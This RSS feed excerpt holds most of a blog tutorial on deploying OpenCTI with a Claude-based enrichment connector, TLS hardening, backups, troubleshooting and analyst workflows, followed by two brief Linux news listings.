-------------------------------------------------------------------------<br>    # Claude call with retry on rate limit<br>    # -------------------------------------------------------------------------<br><br>    def _call_claude(self, prompt_template: str, content: str) -&gt; dict | None:<br>        for attempt in range(3):<br>            try:<br>                msg = self.client.messages.create(<br>                    model=self.model,<br>                    max_tokens=2048,<br>                    system=SYSTEM_PROMPT,<br>                    messages=[{"role": "user", "content": prompt_template.format(content=content[:8000])}],<br>                )<br>                return json.loads(msg.content[0].text)<br>            except anthropic.RateLimitError:<br>                wait = 60 * (attempt + 1)<br>                self.helper.log_warning(f"Rate limited — waiting {wait}s")<br>                time.sleep(wait)<br>            except (json.JSONDecodeError, anthropic.APIError) as e:<br>                self.helper.log_error(f"Claude call failed: {e}")<br>                return None<br>        return None<br><br>    # -------------------------------------------------------------------------<br>    # STIX write-back helpers<br>    # -------------------------------------------------------------------------<br><br>    def _add_note(self, entity_id: str, summary: str, confidence: int) -&gt; None:<br>        self.helper.api.note.create(<br>            abstract="AI Summary",<br>            content=summary,<br>            confidence=confidence,<br>            object_ids=[entity_id],<br>        )<br><br>    def _link_threat_actors(self, entity_id: str, names: list, confidence: int) -&gt; None:<br>        for name in names:<br>            actor = self.helper.api.threat_actor_group.read(<br>                filters={"mode": "and", "filters": [{"key": "name", "values": [name]}], "filterGroups": []}<br>            )<br>            if actor:<br>                self.helper.api.stix_core_relationship.create(<br>                    fromId=entity_id,<br>                    toId=actor["id"],<br>                    relationship_type="related-to",<br>                    confidence=confidence,<br>                )<br><br>    def _link_malware(self, entity_id: str, names: list, confidence: int) -&gt; None:<br>        for name in names:<br>            malware = self.helper.api.malware.read(<br>                filters={"mode": "and", "filters": [{"key": "name", "values": [name]}], "filterGroups": []}<br>            )<br>            if malware:<br>                self.helper.api.stix_core_relationship.create(<br>                    fromId=entity_id,<br>                    toId=malware["id"],<br>                    relationship_type="uses",<br>                    confidence=confidence,<br>                )<br><br>    def _link_attack_patterns(self, entity_id: str, technique_ids: list, confidence: int) -&gt; None:<br>        for tid in technique_ids:<br>            pattern = self.helper.api.attack_pattern.read(<br>                filters={"mode": "and", "filters": [{"key": "x_mitre_id", "values": [tid]}], "filterGroups": []}<br>            )<br>            if not pattern:<br>                pattern = self.helper.api.attack_pattern.create(<br>                    name=tid,<br>                    x_mitre_id=tid,<br>                    confidence=50,<br>                )<br>            if pattern:<br>                self.helper.api.stix_core_relationship.create(<br>                    fromId=entity_id,<br>                    toId=pattern["id"],<br>                    relationship_type="uses",<br>                    confidence=confidence,<br>                )<br><br>    def _update_score(self, entity_id: str, confidence: int) -&gt; None:<br>        self.helper.api.stix_domain_object.update_field(<br>            id=entity_id,<br>            input={"key": "x_opencti_score", "value": str(confidence)},<br>        )<br><br>    # -------------------------------------------------------------------------<br>    # Enrichment handlers per entity type<br>    # -------------------------------------------------------------------------<br><br>    def _enrich_report(self, report: dict) -&gt; str:<br>        content = report.get("description") or ""<br>        if len(content) &lt; 50:<br>            content = report.get("name", "")<br>        if not content or len(content) &lt; 10:<br>            return "Skipped: content too short"<br><br>        self.helper.log_info(f"Enriching report: {report['name']}")<br>        result = self._call_claude(REPORT_PROMPT, content)<br>        if not result:<br>            return "Skipped: Claude error"<br><br>        confidence = result.get("confidence", 50)<br>        entity_id = report["id"]<br><br>        if result.get("summary"):<br>            self._add_note(entity_id, result["summary"], confidence)<br>        if result.get("threat_actors"):<br>            self._link_threat_actors(entity_id, result["threat_actors"], confidence)<br>        if result.get("malware_families"):<br>            self._link_malware(entity_id, result["malware_families"], confidence)<br>        if result.get("attack_techniques"):<br>            self._link_attack_patterns(entity_id, result["attack_techniques"], confidence)<br><br>        self._update_score(entity_id, confidence)<br>        self.helper.log_info(f"Enriched report '{report['name']}'")<br>        return "Enriched"<br><br>    def _enrich_intrusion_set(self, entity: dict) -&gt; str:<br>        content = entity.get("description") or entity.get("name", "")<br>        if not content or len(content) &lt; 10:<br>            return "Skipped: content too short"<br><br>        self.helper.log_info(f"Enriching intrusion set: {entity['name']}")<br>        result = self._call_claude(INTRUSION_SET_PROMPT, content)<br>        if not result:<br>            return "Skipped: Claude error"<br><br>        confidence = result.get("confidence", 50)<br>        entity_id = entity["id"]<br><br>        if result.get("summary"):<br>            self._add_note(entity_id, result["summary"], confidence)<br>        if result.get("malware_families"):<br>            self._link_malware(entity_id, result["malware_families"], confidence)<br>        if result.get("attack_techniques"):<br>            self._link_attack_patterns(entity_id, result["attack_techniques"], confidence)<br><br>        self.helper.log_info(f"Enriched intrusion set '{entity['name']}'")<br>        return "Enriched"<br><br>    # -------------------------------------------------------------------------<br>    # Event handler<br>    # -------------------------------------------------------------------------<br><br>    def process_message(self, data: dict) -&gt; str:<br>        entity_type = data.get("entity_type", "").lower()<br>        entity_id = data.get("entity_id")<br>        enrichment_entity = data.get("enrichment_entity", {})<br><br>        self.helper.log_info(f"Received entity_type='{entity_type}' id='{entity_id}'")<br><br>        if not entity_id:<br>            return "Skipped"<br><br>        entity = enrichment_entity or {}<br><br>        if entity_type == "report":<br>            if not entity:<br>                entity = self.helper.api.report.read(id=entity_id) or {}<br>            if entity.get("confidence", 0) &lt; 40:<br>                return "Skipped: low confidence"<br>            return self._enrich_report(entity)<br><br>        if entity_type in ("intrusion-set", "threat-actor-group"):<br>            if not entity:<br>                entity = self.helper.api.intrusion_set.read(id=entity_id) or {}<br>            if not entity:<br>                return "Not found"<br>            return self._enrich_intrusion_set(entity)<br><br>        if entity_type == "malware":<br>            if not entity:<br>                entity = self.helper.api.malware.read(id=entity_id) or {}<br>            if not entity:<br>                return "Not found"<br>            content = entity.get("description") or entity.get("name", "")<br>            if not content or len(content) &lt; 10:<br>                return "Skipped: content too short"<br>            self.helper.log_info(f"Enriching malware: {entity['name']}")<br>            result = self._call_claude(REPORT_PROMPT, content)<br>            if not result:<br>                return "Skipped: Claude error"<br>            confidence = result.get("confidence", 50)<br>            if result.get("summary"):<br>                self._add_note(entity["id"], result["summary"], confidence)<br>            if result.get("attack_techniques"):<br>                self._link_attack_patterns(entity["id"], result["attack_techniques"], confidence)<br>            self._update_score(entity["id"], confidence)<br>            return "Enriched"<br><br>        return "Skipped"<br><br>    def start(self):<br>        self.helper.log_info("AI Enrichment connector starting...")<br>        self.helper.listen(self.process_message)<br><br><br>if __name__ == "__main__":<br>    AIEnrichmentConnector().start()</pre><p><a href="https://infosecwriteups.com/connectors/ai-enrichment/Dockerfile"><strong>connectors/ai-enrichment/Dockerfile</strong></a></p><pre>FROM python:3.11-slim<br>WORKDIR /app<br>COPY requirements.txt .<br>RUN pip install --no-cache-dir -r requirements.txt<br>COPY connector.py .<br>CMD ["python", "connector.py"]</pre><p><a href="https://infosecwriteups.com/connectors/ai-enrichment/requirements.txt"><strong>connectors/ai-enrichment/requirements.txt</strong></a></p><pre>pycti&gt;=6.2.0<br>anthropic&gt;=0.40.0</pre><h4>9.4 Deploy the AI Connector</h4><p><strong>Prerequisites:</strong> Set ANTHROPIC_API_KEY in .env first.</p><pre>cd /home/andrey/openCTI<br># Build the image<br>docker compose -f docker-compose.ai.yml build<br># Start it<br>docker compose -f docker-compose.ai.yml up -d<br># Verify it registered with OpenCTI (look for "AI Enrichment" in connector list)<br>docker logs opencti-connector-ai-enrichment-1 --tail=20</pre><p>In the OpenCTI UI: <strong>Settings → Connectors → Enrichment</strong> — the connector should appear with status connected after ~10 seconds.</p><h4>9.5 Testing the Pipeline</h4><p>Trigger a manual enrichment by importing a real threat report:</p><pre># Import a STIX report via the API to trigger the connector<br>curl -s -X POST http://localhost:8080/graphql \<br>  -H "Authorization: Bearer $(grep OPENCTI_ADMIN_TOKEN .env | cut -d= -f2)" \<br>  -H "Content-Type: application/json" \<br>  -d '{<br>    "query": "mutation { reportAdd(input: { name: \"Test: APT29 spearphishing campaign\", description: \"APT29, also known as Cozy Bear, conducted a spearphishing campaign targeting NATO members using a malicious PDF dropper that installed Cobalt Strike beacon via PowerShell (T1059.001). The campaign targeted defense contractors in Poland and Germany. The malware communicated with C2 over HTTPS using domain fronting (T1090.004).\", published: \"2024-01-15T00:00:00Z\", report_types: [\"threat-report\"] }) { id name } }"<br>  }'</pre><p>Then check what the AI connector wrote back:</p><pre># Watch connector logs for the enrichment<br>docker logs -f opencti-connector-ai-enrichment-1 2&gt;&amp;1 | grep -E "Enriching|Enriched|Error"<br># Expected output:<br># Enriching report: Test: APT29 spearphishing campaign<br># Enriched: 1 actors, 1 malware, 2 techniques</pre><p>In the UI, open the report — it should now have a Note with the summary, relationships to APT29 and Cobalt Strike, and links to T1059.001 and T1090.004.</p><h4>9.6 Cost and Rate Limiting</h4><p><strong>Estimated Claude API cost per report:</strong></p><ul><li>~500–2000 tokens input (report text, truncated at 8000 chars)</li><li>~300 tokens output (JSON response)</li><li>At claude-opus-4-7 pricing: ~$0.01–0.05 per report</li></ul><p><strong>Rate limiting:</strong> The Anthropic API has per-minute token limits. If AlienVault imports hundreds of reports in a burst, the connector will hit rate limits. Add a simple backoff:</p><pre>import time<br>def _call_claude(self, content: str) -&gt; dict | None:<br>    for attempt in range(3):<br>        try:<br>            msg = self.client.messages.create(...)<br>            return json.loads(msg.content[0].text)<br>        except anthropic.RateLimitError:<br>            time.sleep(60 * (attempt + 1))<br>        except (json.JSONDecodeError, anthropic.APIError) as e:<br>            self.helper.log_error(f"Claude call failed: {e}")<br>            return None<br>    return None</pre><p><strong>To limit scope</strong> (only enrich reports above a confidence threshold, skip low-quality feeds):</p><pre>def process_message(self, data: dict) -&gt; str:<br>    report = self.helper.api.report.read(id=entity_id)<br>    # Skip reports with low confidence (e.g. AlienVault auto-generated)<br>    if report.get("confidence", 0) &lt; 40:<br>        return "Skipped: low confidence"<br>    return self._enrich_report(report)</pre><h4>9.7 Rules Engine (CE Automation)</h4><p><strong>Note:</strong> Playbooks are an Enterprise Edition feature. The Community Edition uses the built-in Rules Engine, which automatically infers and propagates relationships as data arrives.</p><p>All 20 rules are enabled. To verify or toggle: <strong>Settings → Customization → Rules</strong></p><p>To enable all rules via API (already done — included for re-initialization):</p><pre>RULES="attribution_attribution attribution_targets indicate_sighted attribution_use \<br>localization_of_targets location_location location_targets participate-to_parts \<br>observable_related observe_sighting part_part part-of_targets sighting_incident \<br>sighting_observable sighting_indicator report_ref_identity_part_of \<br>report_ref_indicator_based_on report_ref_observable_based_on \<br>report_ref_location_located_at parent_technique_use"<br>TOKEN=$(grep OPENCTI_ADMIN_TOKEN /home/andrey/openCTI/.env | cut -d= -f2)<br>for rule in $RULES; do<br>  curl -s -X POST http://localhost:8080/graphql \<br>    -H "Authorization: Bearer $TOKEN" \<br>    -H "Content-Type: application/json" \<br>    -d "{\"query\":\"mutation { ruleSetActivation(id: \\\"$rule\\\", enable: true) { id activated } }\"}" \<br>    | python3 -c "import sys,json; d=json.load(sys.stdin); print('$rule:', d['data']['ruleSetActivation']['activated'])"<br>done</pre><p><strong>What these rules do automatically once data arrives:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*epLGa3gwJILd0FyMKdsQQg.png"></figure><p>RuleEffectattribution_attributionIf APT-X is attributed to Country-A, and APT-Y is a sub-group of APT-X → APT-Y also attributed to Country-Asighting_incidentIf an indicator is sighted, automatically raise an Incidentindicate_sightedIf indicator is sighted → infer the targeted entity from the indicator's relationshipreport_ref_indicator_based_onIf a Report references Observable X, and X has an Indicator → auto-link the Indicator to the Reportobservable_relatedIf two objects share a common Observable → infer a related-to relationshipparent_technique_useIf a sub-technique (T1059.001) is used → auto-link parent technique (T1059) as used</p><p><strong>For custom event-driven automation in CE</strong>, use a pycti script or the AI connector (section 9.1). The pycti library supports streaming the live event feed via helper.listen() — the AI connector in 9.1 uses exactly this pattern.</p><h3>10. Post-Deployment Hardening</h3><h4>10.1 Reverse Proxy with TLS (nginx)</h4><pre># /etc/nginx/sites-available/opencti<br>server {<br>    listen 443 ssl http2;<br>    server_name opencti.yourdomain.com;<br>ssl_certificate     /etc/letsencrypt/live/opencti.yourdomain.com/fullchain.pem;<br>    ssl_certificate_key /etc/letsencrypt/live/opencti.yourdomain.com/privkey.pem;<br>    ssl_protocols       TLSv1.2 TLSv1.3;<br>    ssl_ciphers         ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384;<br>    location / {<br>        proxy_pass         http://127.0.0.1:8080;<br>        proxy_set_header   Host $host;<br>        proxy_set_header   X-Real-IP $remote_addr;<br>        proxy_set_header   X-Forwarded-For $proxy_add_x_forwarded_for;<br>        proxy_set_header   X-Forwarded-Proto $scheme;<br>        proxy_read_timeout 300s;<br>        client_max_body_size 100m;<br>    }<br>}<br>server {<br>    listen 80;<br>    server_name opencti.yourdomain.com;<br>    return 301 https://$host$request_uri;<br>}</pre><h4>10.2 Backup Strategy</h4><pre>#!/bin/bash<br># /home/andrey/openCTI/scripts/backup.sh<br>set -euo pipefail<br>BACKUP_DIR="/mnt/backup/opencti/$(date +%Y%m%d_%H%M%S)"<br>mkdir -p "$BACKUP_DIR"<br># Snapshot ElasticSearch<br>curl -s -u elastic:${ELASTIC_PASSWORD} \<br>  -X PUT "http://localhost:9200/_snapshot/backup/snapshot_$(date +%Y%m%d)" \<br>  -H 'Content-Type: application/json' \<br>  -d '{"indices": "*", "ignore_unavailable": true}'<br># Dump MinIO (reports, files)<br>docker run --rm \<br>  --network opencti_network \<br>  -v "$BACKUP_DIR:/backup" \<br>  minio/mc:latest \<br>  mirror myminio/opencti /backup/minio/<br>echo "Backup completed: $BACKUP_DIR"</pre><h4>10.3 Security Checklist</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*hjQWso4p7MIiBfcRr15oZw.png"></figure><ul><li>Change all default passwords in .env</li><li>Generate unique UUID4 tokens for every connector</li><li>Enable TLS via nginx reverse proxy</li><li>Restrict port 8080 to localhost only (127.0.0.1:8080:8080)</li><li>Enable ElasticSearch authentication (already configured above)</li><li>Set up fail2ban on the nginx access log</li><li>Rotate OPENCTI_ADMIN_TOKEN every 90 days</li><li>Review TLP markings — ensure nothing RED leaks via TAXII</li><li>Enable audit logging: APP__APP_LOGS__LOGS_LEVEL: info</li></ul><h3>11. Operational Runbook</h3><h4>Day 1 — Initial Data Load</h4><pre># MITRE ATT&amp;CK loads first (foundational framework)<br># Wait ~10 minutes for it to complete, then verify:<br>TOKEN=$(grep OPENCTI_ADMIN_TOKEN /home/andrey/openCTI/.env | cut -d= -f2)<br><br>curl -s -X POST http://localhost:8080/graphql \<br>  -H "Authorization: Bearer $TOKEN" \<br>  -H "Content-Type: application/json" \<br>  -d '{"query": "{ attackPatterns { edges { node { name } } } }"}' | \<br>  python3 -c "import sys,json; d=json.load(sys.stdin); print('Techniques loaded:', len(d['data']['attackPatterns']['edges']))"<br># Should return 500+ techniques</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*V2XGUwLrUpe1XNLUono5Ng.png"></figure><h4>Common Operations</h4><pre># Check all connector health<br>docker compose -f docker-compose.connectors.yml ps<br># View connector logs<br>docker compose -f docker-compose.connectors.yml logs --tail=50 connector-alienvault<br># Restart a stuck connector<br>docker compose -f docker-compose.connectors.yml restart connector-malwarebazaar<br># Scale workers for high ingest load<br>docker compose -f docker-compose.yml up -d --scale worker=5<br># Check ElasticSearch cluster health<br>curl -s -u elastic:${ELASTIC_PASSWORD} http://localhost:9200/_cluster/health?pretty<br># Check RabbitMQ queue depth (should stay near 0 at rest)<br>docker exec $(docker ps -qf name=rabbitmq) rabbitmqctl list_queues name messages</pre><h4>Monitoring Metrics to Watch</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dn9gJsZa98wedqD6PdcrQA.png"></figure><h4>Quick Reference</h4><pre># Start everything<br>cd /home/andrey/openCTI<br>docker network create opencti_network 2&gt;/dev/null || true<br>docker compose -f docker-compose.yml up -d<br>docker compose -f docker-compose.connectors.yml up -d<br>docker compose -f docker-compose.ai.yml up -d<br># Stop everything<br>docker compose -f docker-compose.ai.yml down<br>docker compose -f docker-compose.connectors.yml down<br>docker compose -f docker-compose.yml down<br># Access<br># UI:      http://localhost:8080<br># API:     http://localhost:8080/graphql<br># MinIO:   http://localhost:9001<br># RabbitMQ: http://localhost:15672</pre><h3>12. Troubleshooting</h3><h3>Known Issues — OpenCTI 6.2.0 + ElasticSearch 8.13</h3><h4>ILM Race Condition (resource_already_exists_exception)</h4><p>ES 8.13’s ILM daemon auto-bootstraps rollover indices the moment an index template with lifecycle.rollover_alias is created. OpenCTI's elCreateIndex does a check-then-create which loses the race. This kills initialization and loops with restart: always.</p><p><strong>Fix already applied:</strong> patches/back.js is mounted over the compiled bundle and makes elCreateIndex idempotent — it catches resource_already_exists_exception and returns null.</p><p><strong>Re-initialization procedure</strong> (if ES volume is dropped):</p><pre># 1. Delete any leftover index templates from a failed run<br>curl -s -u elastic:${ELASTIC_PASSWORD} -X DELETE \<br>  "http://localhost:9200/_index_template/opencti*"</pre><pre># 2. Flush Redis state<br>docker exec opencti-redis-1 redis-cli -a opencti FLUSHALL</pre><pre># 3. Start ES first, wait for green/yellow<br>docker compose up -d elasticsearch<br>until curl -s -u elastic:${ELASTIC_PASSWORD} \<br>  <a href="http://localhost:9200/_cluster/health">http://localhost:9200/_cluster/health</a> | grep -q '"status":"green"\|"status":"yellow"'; do<br>  sleep 5; done</pre><pre># 4. Start the rest — OpenCTI will create 13 indices and load base STIX data (~5-10 min)<br>docker compose up -d</pre><h4>ElasticSearch Disk Watermark (cluster RED, no shard allocation)</h4><p>ES 8.x refuses all shard allocation when disk exceeds 90% high watermark. cluster.routing.allocation.disk.threshold_enabled=false is set in docker-compose.yml.</p><p>To reclaim disk space:</p><pre>docker system prune -a   # frees ~47 GB of unused images/containers</pre><h4>Connectors Can’t Reach opencti Hostname</h4><p>Both compose files must share the same Docker network. docker-compose.yml defines:</p><pre>networks:<br>  default:<br>    name: opencti_network<br>    external: true</pre><p>If the main stack was started without this, run:</p><pre>docker network connect --alias opencti opencti_network opencti-opencti-1</pre><p>Then add the networks: block to docker-compose.yml and run docker compose up -d to make it permanent.</p><h4>OPENCTI_TOKEN vs CONNECTOR_ID</h4><p>Connectors authenticate to OpenCTI using OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}. The per-connector UUID variables (CONNECTOR_MITRE_TOKEN, etc.) are only used as CONNECTOR_ID — they identify the connector instance in the UI, not for authentication.</p><h4>CVE Connector — Zero Vulnerabilities Imported (NVD API Key Bug)</h4><p>connector-cve:6.2.0 has a bug: it sends the NVD API key as Bearer: &lt;key&gt; in the HTTP header, but NVD 2.0 API requires apiKey: &lt;key&gt;. The connector silently gets a non-200 response and imports nothing. Additionally, CVE_MAX_DATE_RANGE is required but missing from the image's default config — omitting it causes a TypeError: '&gt;' not supported between instances of 'NoneType' and 'int' crash every 60 seconds.</p><p><strong>Fix:</strong> Mount a patched api.py that uses the correct header, and add the missing vars:</p><pre>connector-cve:<br>  image: opencti/connector-cve:6.2.0<br>  volumes:<br>    - ./patches/cve/api.py:/opt/opencti-connector-cve/services/client/api.py:ro<br>  environment:<br>    CVE_MAX_DATE_RANGE: 120<br>    CVE_MAINTAIN_DATA: "true"<br>    # ... other vars</pre><p>patches/cve/api.py — change header from "Bearer": api_key to "apiKey": api_key:</p><pre>headers = {"User-Agent": header}<br>if api_key:<br>    headers["apiKey"] = api_key</pre><h3>13. Usage Examples</h3><h4>13.1 Standard OpenCTI Workflows</h4><h4>Example 1 — Investigate an IP address</h4><p>You received an alert from your SIEM about suspicious outbound traffic to 103.113.70.102.</p><p><strong>In OpenCTI UI:</strong></p><pre>Search → type 103.113.70.102</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2k7QE2Urnr8tw_xJ2MyAPA.png"></figure><p>If AlienVault or URLhaus has seen it, you’ll find:</p><ul><li>Which threat actor uses this IP as C2</li><li>What malware family communicates with it</li><li>When it was first/last observed</li><li>TLP marking and confidence score</li><li>All reports that mention it</li></ul><p><strong>Via API:</strong></p><pre>TOKEN=$(grep OPENCTI_ADMIN_TOKEN /home/andrey/openCTI/.env | cut -d= -f2)<br>curl -s -X POST http://localhost:8080/graphql \<br>  -H "Authorization: Bearer $TOKEN" \<br>  -H "Content-Type: application/json" \<br>  -d '{"query": "{ stixCyberObservables(filters: {mode: and, filters: [{key: \"value\", values: [\"https://103.113.70.102/bin/support.client.exe\"]}], filterGroups: []}) { edges { node { id entity_type ... on Url { value } } } } }"}' | python3 -m json.tool</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fe53xHSxwntH5knkGjSO6g.png"></figure><h4>Example 2 — Build an APT profile</h4><p>You want to understand everything known about Lazarus Group before a threat briefing.</p><pre><br>Threats → Intrusion Sets → search "Lazarus"</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*S-QNk2tNF4lgs9q6-YaTUQ.png"></figure><p>The profile shows:</p><ul><li><strong>Attributed to:</strong> North Korea</li><li><strong>Motivations:</strong> Financial gain, Espionage</li><li><strong>Targets:</strong> Finance, Cryptocurrency, Defense</li><li><strong>Malware used:</strong> WannaCry, Hermes, BLINDINGCAN (all auto-linked by MITRE connector)</li><li><strong>Techniques:</strong> 80+ ATT&amp;CK techniques with usage relationships</li><li><strong>Campaigns:</strong> Operation AppleJeus, Dream Job, etc.</li><li><strong>Timeline:</strong> chronological view of all activity</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Gmvuu4OUs0uIgRZDt9p3fA.png"></figure><p>Click <strong>“ATT&amp;CK Patterns”</strong> tab → heatmap showing which techniques Lazarus uses most.</p><h4>Example 3 — Import a threat report (PDF / blog post)</h4><p>You found a Mandiant or CrowdStrike blog post about a new campaign.</p><pre>Data → Import → drag and drop the PDF or paste the URL<br>Select format: "Auto detect" or "Report"</pre><p>OpenCTI parses it and creates a Report object. The AI enrichment connector then picks it up automatically and extracts:</p><ul><li>Threat actors mentioned</li><li>Malware families</li><li>ATT&amp;CK technique IDs</li><li>Targeted sectors and countries</li></ul><p>All as STIX relationships, visible immediately in the UI.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zPViHJ6GKjMeHMtM8240gg.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YQBdTFlcQ_q9NcblRik5pw.png"></figure><h4>Example 4 — Track a CVE across your environment</h4><p>CVE-2024–21762 (Fortinet FortiOS RCE) was just published. Check what you know about it.</p><pre>Arsenal → Vulnerabilities → search "CVE-2024-21762"</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*G9LM5wxYywcTYVdLC331jw.png"></figure><p>After the CVE connector syncs, you’ll see:</p><ul><li>CVSS score and vector</li><li>Affected software versions</li><li>Which threat actors exploit it (once AlienVault/MITRE data arrives)</li><li>Which campaigns used it</li><li>Related indicators (IPs, domains used in exploitation)</li></ul><h4>Example 5 — Create an incident from a sighting</h4><p>Your EDR detected Cobalt Strike beacon on a workstation.</p><pre>Activities → Incidents → Create<br>  Name: "CS beacon on WS-042"<br>  Type: "Intrusion"<br>  Confidence: 90<br>  Add object: link to Cobalt Strike (malware)<br>  Add object: link to T1071.001 (C2 over HTTP)<br>  Add observable: add the C2 IP</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Zm8Mi5l-QnFsTb0jAia32A.png"></figure><p>With sighting_incident rule enabled, future detections of the same C2 IP automatically raise new incidents without manual work.</p><h4>Example 6 — Export IOCs to your firewall / SIEM</h4><p>You want a live blocklist of all HIGH confidence IPv4 indicators.</p><pre>Data → Indicators<br>Filter: Score &gt; 70, Type = IPv4-Addr, Valid until &gt; today<br>Export → CSV or STIX</pre><p>Or use the built-in <strong>TAXII 2.1 server</strong> to push directly to your SIEM:</p><pre>Settings → Taxii Server → Create collection "High confidence IOCs"<br>Configure your SIEM to poll: http://localhost:8080/taxii2/</pre><h4>Example 7 — Map your detection coverage against ATT&amp;CK</h4><p>You want to know which techniques you detect vs which you’re blind to.</p><pre>Technics → Attack Patterns<br>Filter by: used by (Lazarus Group)</pre><p>Cross-reference the list with your SIEM detection rules. Techniques with no detection rule = gap in coverage.</p><p>Export the filtered list as CSV and import into ATT&amp;CK Navigator for a visual heatmap of covered vs uncovered techniques.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*mPwgsMfkEtXK1y1rnlj0Hw.png"></figure><h4>Example 8 — Pivot from malware to infrastructure</h4><p>You found a Ryuk ransomware sample (SHA256 hash).</p><pre>Search → paste the SHA256</pre><p>From the malware object, pivot to:</p><ul><li><strong>Related indicators</strong> → domains and IPs used for C2</li><li><strong>Used by</strong> → Wizard Spider (threat actor)</li><li><strong>Campaigns</strong> → which ransomware campaigns used this variant</li><li><strong>Techniques</strong> → T1486 (Data Encrypted for Impact), T1490 (Inhibit System Recovery)</li></ul><p>Each pivot is one click in the graph view.</p><h4>Example 9 — Share intelligence with a partner org</h4><p>You want to share a report with a partner but strip out RED-marked internal data.</p><pre>Open the report → Actions → Share<br>Select TLP level: TLP:AMBER (only partner can see it)</pre><p>Or use <strong>Workspaces → Sharing groups</strong> to create a federated share with another OpenCTI instance. All objects above RED are automatically excluded from the export.</p><h4>Example 10 — Build a custom dashboard for your sector</h4><p>Your org is in Finance. You want a live dashboard showing threats to your sector.</p><pre>Home → Dashboards → Create dashboard "Finance Threat Landscape"<br>Add widgets:<br>  - "Threat actors targeting Finance" (bar chart)<br>  - "Most used techniques against Finance" (ATT&amp;CK heatmap)<br>  - "New IOCs last 7 days" (timeline)<br>  - "Active campaigns" (list)<br>  - "CVEs affecting banking software" (table)</pre><p>Each widget auto-updates as new data arrives from connectors.</p><h4>If you like this research, <a href="https://www.paypal.com/donate/?business=W3XDKS7J9XTCG&amp;no_recurring=0&amp;item_name=Buy+me+a+coffee+%28PayPal%29+%E2%80%94+Keep+the+lab+running&amp;currency_code=USD">buy me a coffee (PayPal) — Keep the lab running</a></h4><h3>Follow for practical cybersecurity research</h3><p>If you’re interested in <strong>Offensive security,</strong> <strong>AI security, real-world attack simulations, CTI, and detection engineering</strong> — this is exactly what I focus on.</p><h4>Stay connected:</h4><p>→ <strong>Subscribe on Medium:</strong> <a href="https://medium.com/@1200km">medium.com/@1200km</a><br>→ <strong>Connect on LinkedIn:</strong> <a href="https://www.linkedin.com/in/andrey-pautov/">andrey-pautov</a><br>→ <strong>GitHub — tools &amp; labs:</strong> <a href="https://github.com/anpa1200">github.com/anpa1200</a><br>→ <strong>Contact:</strong> <a href="mailto:1200km@gmail.com">1200km@gmail.com</a></p><h4>Andrey Pautov</h4><p>Follow My Work</p><p>I publish practical cybersecurity research, CTI workflows, detection engineering notes, malware analysis projects, OpenCTI work, cloud and Kubernetes security research, AI-assisted security tooling, labs, and technical guides.</p><p>Portfolio / Knowledge Base: <a href="https://1200km.com/">https://1200km.com/</a><br>Medium: <a href="https://medium.com/@1200km">https://medium.com/@1200km</a><br>GitHub: <a href="https://github.com/anpa1200">https://github.com/anpa1200</a><br>LinkedIn: <a href="https://www.linkedin.com/in/andrey-pautov/">https://www.linkedin.com/in/andrey-pautov/</a></p><p>Andrey Pautov</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=057c9b4b9394" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394">The Intelligent Shield. OpenCTI</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] LWN.net Weekly Edition for June 11, 2026]]></title>
<description><![CDATA[Inside this week's LWN.net Weekly Edition:
        
        
 Front: Suspicious AI activity in Fedora; fork() + exec(); splice() + vmsplice(); BPF loop verification; fanotify; trusted publishing.
             Briefs: CA age bill; Bundler cooldowns; insecure code completion; Asahi and macOS 27 bet...]]></description>
<link>https://tsecurity.de/de/3589261/linux-tipps/lwnnet-weekly-edition-for-june-11-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589261/linux-tipps/lwnnet-weekly-edition-for-june-11-2026/</guid>
<pubDate>Thu, 11 Jun 2026 02:24:49 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Inside this week's LWN.net Weekly Edition:
        <p>
        </p><ul>
<li> <a href="https://lwn.net/Articles/1076254/">Front</a>: Suspicious AI activity in Fedora; fork() + exec(); splice() + vmsplice(); BPF loop verification; fanotify; trusted publishing.
            </li><li> <a href="https://lwn.net/Articles/1076256/">Briefs</a>: CA age bill; Bundler cooldowns; insecure code completion; Asahi and macOS 27 beta; Buildroot 2026.05; Ubuntu MATE; rsync 3.4.4; Quotes; ...
            </li><li> <a href="https://lwn.net/Articles/1076257/">Announcements</a>: Newsletters, conferences, security updates, patches, and more.
            </li></ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (bind and libyang), Debian (keystone and openssl), Fedora (mingw-objfw, objfw, sentencepiece, and tailscale), Mageia (packagekit and suricata), Oracle (bind, bind9.16, go-toolset:ol8, ImageMagick, kernel, samba, and vim), SUSE (apache-commons-lang3, ...]]></description>
<link>https://tsecurity.de/de/3584624/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584624/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 09 Jun 2026 15:08:45 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
